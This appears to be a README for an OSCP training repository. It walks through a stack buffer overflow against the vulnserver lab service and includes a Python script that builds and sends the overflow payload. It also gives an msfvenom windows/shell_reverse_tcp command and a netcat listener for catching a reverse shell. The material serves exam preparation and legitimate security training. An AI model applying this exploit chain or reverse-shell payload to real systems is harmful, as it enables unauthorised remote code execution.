This repository gives you the detailed commands for a stack-based buffer overflow (vulnserver, OSCP style).
-
open the file fuzz.py and send buffers of increasing length until the service crashes -- note the length that crashed it
-
create a unique pattern of that length to find the offset to EIP -- use pattern_create from metasploit (pattern_create.rb -l <length>)
read the EIP value from the debugger at the crash and run pattern_offset from metasploit with it (pattern_offset.rb -q <EIP>) -- this gives the exact offset
run the create-pattern script to send the pattern to the target
-
add 4 extra bytes (e.g. BBBB) after the offset and confirm they land in EIP -- EIP should read 42424242 in the debugger
-
create badchars -- https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
find out the bad chars (send \x01..\xff after the EIP overwrite, compare in the debugger with mona, note every byte that gets mangled) !! remove them and repeat until none are left (\x00 is almost always bad)
now create shellcode with msfvenom -- pass your removed bad chars with -b
- start a listener (nc -nlvp <port>) and get a reverse shell
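The whole procedure above, as one added worked example (this is not the repo's fuzz.py and not code from the linked blogs). It reimplements the Metasploit pattern_create/pattern_offset logic in pure Python, builds the bad-char buffer, and assembles the final payload. The TRUN command prefix, the EIP value 0x386F4337, the placeholder return address and the placeholder shellcode are assumptions; replace them with what your debugger and msfvenom give you.

```python
"""Stack-based buffer overflow helpers (constructed example for this README).

Pure-Python stand-ins for pattern_create.rb / pattern_offset.rb, a bad-char
buffer generator and a payload builder. Host, port, command prefix, return
address and shellcode below are placeholders, not values from the original page.
"""
import socket
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 unique bytes


def pattern_create(length):
    """Same cyclic pattern as Metasploit's pattern_create.rb: Aa0Aa1Aa2...Ab0Ab1..."""
    groups = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                groups.append(u + l + d)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]


def pattern_offset(eip_value, length=MAX_PATTERN):
    """Offset of the 4 pattern bytes that landed in EIP (like pattern_offset.rb -q).

    eip_value is the register value as the debugger shows it (e.g. 0x386F4337).
    x86 is little-endian, so the bytes in memory are the reverse of that value.
    """
    needle = struct.pack("<I", eip_value)
    idx = pattern_create(length).encode("ascii").find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in the pattern; was EIP really overwritten by it?")
    return idx


def badchars(exclude=(0x00,)):
    """All bytes 0x00-0xFF minus the ones already known to be bad.

    Send this after the EIP overwrite, compare the stack with mona, add every
    mangled byte to `exclude` and send again until nothing is mangled.
    """
    excluded = set(exclude)
    return bytes(b for b in range(256) if b not in excluded)


def build_payload(command, offset, ret_addr, shellcode, nops=16):
    """command + filler up to EIP + return address (little-endian) + NOP sled + shellcode."""
    buf = b"A" * offset                 # filler up to the saved EIP
    buf += struct.pack("<I", ret_addr)  # overwrites EIP (0x42424242 gives 'BBBB' for the control check)
    buf += b"\x90" * nops               # NOP sled, ESP points here after JMP ESP
    buf += shellcode
    return command + buf


def send_payload(host, port, payload):
    """The network part of fuzz.py: connect, read the banner, deliver the payload."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)
        s.send(payload + b"\r\n")


if __name__ == "__main__":
    CMD = b"TRUN /.:/"                       # assumed vulnerable command prefix
    offset = pattern_offset(0x386F4337)      # example EIP value read from the debugger
    print("EIP offset:", offset)             # 2003 for that value
    # control check: EIP must read 42424242 in the debugger
    control = build_payload(CMD, offset, 0x42424242, b"C" * 16, nops=0)
    # bad-char run: grow the exclude tuple with every byte mona reports as mangled
    bad = build_payload(CMD, offset, 0x42424242, badchars((0x00,)), nops=0)
    # final run: shellcode from
    #   msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -b "\x00" -f python -v shellcode
    shellcode = b"\xcc"                      # placeholder, paste the msfvenom output here
    ret_addr = 0xDEADBEEF                    # placeholder, use a JMP ESP address found in the debugger
    final = build_payload(CMD, offset, ret_addr, shellcode)
    # send_payload("192.168.1.10", 9999, final)   # uncomment with your target's host/port
```

Run each stage in order and check the debugger between them: the pattern run gives the EIP value for pattern_offset, the control run must show 42424242 in EIP, and the bad-char run is repeated until mona reports no mangled bytes before you generate the shellcode with those bytes in -b.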
visit https://github.com/c3rtcub3/stack_based_buffer_overflow_vulnserver/tree/master/bof to check the procedure in more detail and to get the TRUN script for testing against vulnserver
to get a detailed all-in-one buffer overflow guide visit -- https://blog.certcube.com/oscp-detail-guide-to-stack-buffer-overflow-1/
follow all 9 blogs and you will get a decent knowledge of BoF which will help you crack the OSCP BoF
Regards, Naresh